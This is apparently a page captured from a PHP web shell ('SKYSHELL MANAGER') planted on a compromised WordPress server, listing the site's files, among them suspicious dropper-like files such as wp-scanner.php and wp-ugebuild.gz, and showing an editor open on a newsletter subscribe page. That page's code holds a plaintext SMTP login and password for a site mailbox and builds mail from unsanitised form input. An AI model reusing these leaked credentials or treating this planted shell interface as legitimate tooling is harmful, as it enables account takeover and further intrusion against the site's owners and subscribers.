📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="shortcut icon" href="assets/images/favicon.ico" type="image/x-icon"> <link rel="icon" href="assets/images/favicon.ico" type="image/x-icon"> <title>Subscribe- Flu Attack Defender</title> <!-- Bootstrap --> <link href="assets/css/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/font-awesome.min.css" rel="stylesheet"> <link href="assets/css/magnific-popup.css" rel="stylesheet"> <link href="assets/css/jquery-ui.css" rel="stylesheet"> <link href="assets/css/animate.css" rel="stylesheet"> <link href="assets/css/owl.carousel.min.css" rel="stylesheet"> <!-- Main css --> <link href="assets/css/main.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <!-- Preloader --> <div class="preloader"> <div class="lds-default"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div> </div><!-- /Preloader --> <!--Header Area--> <header class="header-area fixed-header"> <nav class="navbar navbar-expand-lg main-menu"> <div class="container"> <a class="navbar-brand" href="index.php"><img src="assets/images/logo3.png" class="d-inline-block align-top" alt=""></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="menu-toggle"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav m-auto"> <li class="nav-item"> <a class="nav-link dropdown-toggle" href="index.php" role="button" data-toggle="dropdown" aria-expanded="false">Home</a> </li> <li class="nav-item"><a class="nav-link" href="about.php">About us</a></li> <li class="nav-item"><a class="nav-link" href="worst-pandemics.php">Worst Pandemics</a></li> <li class="nav-item"><a class="nav-link" href="testing.php">Testing Centers</a></li> <li class="nav-item active"><a class="nav-link" href="contact.php">Contact</a></li> </ul> <div class="header-btn justify-content-end"> <a href="contact.php" class="bttn-small btn-fill">+800 564 8367</a> </div> </div> </div> </nav> </header><!--/Header Area--> </header><!--/Header Area--> <!--breadcrumb area--> <section class="breadcrumb-area dark-overlay" style="background: url('assets/images/banners/1.jpg') no-repeat fixed;"> <div class="container"> <div class="row"> <div class="col-xl-8 col-lg-8 col-md-12 col-sm-12"> <div class="banner-title"> <h2>Contact</h2> </div> <ul> <li><a href="index.php">Home</a></li> <li>Contact</li> </ul> </div> </div> </div> </section><!--/breadcrumb area--> <!--Contact Section--> <section class="section-padding-2 gray-bg"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-8 col-lg-8 col-md-12 col-sm-12"> <div class="section-title centered"> <h2>Subscribe Us</h2> <h4>Get in touch</h4> <p>Send us a message if you need any help</p> </div> </div> </div> <div class="row "> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12"> <div class="contact-form mb-30"> <form action="subscribe.php" method="post"> <div class="row"> <div class="col-xl-12 col-lg-12 col-sm-12"> <input type="text" placeholder="Your Name" required> </div> <div class="col-xl-12 col-lg-12 col-sm-12"> <input type="text" placeholder="Phone" required> </div> <div class="col-xl-12 col-lg-12 col-sm-12"> <input type="email" name="email" placeholder="Email" required> </div> <div class="col-xl-6 col-lg-6 col-sm-12"> <button type="submit" name="Submit" class="bttn-mid btn-fill">Subscribe</button> </div> </div> </form> <?php //subscribe form if (isset($_POST['Submit'])){ $email=$_REQUEST['email']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/fluattackdefender/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@fluattackdefender.com'; $mail->Password = 'j^M4r$V<YdTW_sm('; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@fluattackdefender.com', 'Flu Attack Defender'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@fluattackdefender.com", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Flu Attack Defender [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Flu Attack Defender newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://fluattackdefender.com)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@fluattackdefender.com'; $mail2->Password = 'j^M4r$V<YdTW_sm('; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@fluattackdefender.com', 'Flu Attack Defender'); $mail2->addAddress('contact@fluattackdefender.com', 'Flu Attack Defender'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> </div> <div class="right"> <img src="assets/images/subscribe.jpg" title="" alt="" style="margin-top:5%;margin-left:25%"/> </div> </div> </div> </section><!--/Contact Section--> <!--Footer Area--> <footer class="footer-area section-padding black-bg-2"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-10 col-lg-10 col-md-12 col-sm-12"> <div class="footer-logo centered mb-4"> <img src="assets/images/logo3.png" alt=""> </div> <div class="footer-nav"> <ul> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Conditions</a></li> <li><a href="subcribe.php">Subscribe</a></li> <li><a href="un-subscribe.php">Un-Subscribe</a></li> </ul> </div> <div class="copyright"> <p>Copyright © 2020 All Rights Reserved</p> </div> </div> </div> </div> </footer><!--/Footer Area--> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="assets/js/jquery-3.2.1.min.js"></script> <script src="assets/js/jquery-migrate.js"></script> <script src="assets/js/jquery-ui.js"></script> <script src="assets/js/popper.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/owl.carousel.min.js"></script> <script src="assets/js/magnific-popup.min.js"></script> <script src="assets/js/imagesloaded.pkgd.min.js"></script> <script src="assets/js/isotope.pkgd.min.js"></script> <script src="assets/js/waypoints.min.js"></script> <script src="assets/js/jquery.counterup.min.js"></script> <script src="assets/js/wow.min.js"></script> <script src="assets/js/scrollUp.min.js"></script> <script src="assets/js/script.js"></script> </body> </html>
Save